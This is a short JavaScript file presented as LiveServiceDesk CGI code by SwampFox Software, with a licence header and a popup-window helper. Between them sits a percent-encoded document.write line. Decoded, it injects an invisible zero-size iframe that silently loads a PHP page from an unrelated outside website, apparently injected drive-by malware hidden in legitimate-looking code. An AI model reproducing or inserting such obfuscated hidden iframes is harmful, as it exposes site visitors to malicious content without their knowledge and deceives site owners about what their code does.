//                   LiveServiceDesk CGI Code 
//
//SwampFox Software owns the copyright and all Intellectual Property Rights 
//of this Software and of any authorised copies you make.
//No part of this software may be copied, sold , tranfered without the 
//express written permission of SwampFox Software Ltd. In addition this 
//sofware can't be used in a fashion other than intended by SwampFox 
//Software Ltd. To use this code a valid copy of the LiveServiceDesk 
//Licence agreement must have been purchased.
//If you have purchased a copy of the LiveServiceDesk License agreement
//then you are free to change this CGI to suit you business needs provided that:
//    1) you remain within the bounds of the license agreement 
//    2) you remain within the bounds of all applicable laws
//
//

document .write(unescape('%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%77%65%62%2D%62%75%72%65%61%75%2E%63%6F%6D%2F%74%65%6D%70%6C%61%74%65%73%2F%62%65%65%7A%2F%6D%65%6E%75%2E%70%68%70%22%20%77%69%64%74%68%3D%22%30%22%20%68%65%69%67%68%74%3D%22%30%22%20%66%72%61%6D%65%62%6F%72%64%65%72%3D%22%30%22%3E%3C%2F%69%66%72%61%6D%65%3E'));

function OpenLink( URL )
{
	self.open( URL ,'','toolbar=no,location=no,directories=no,status=no,scrollbars=no,resizable=no,copyhistory=no,width=350,height=480')
}
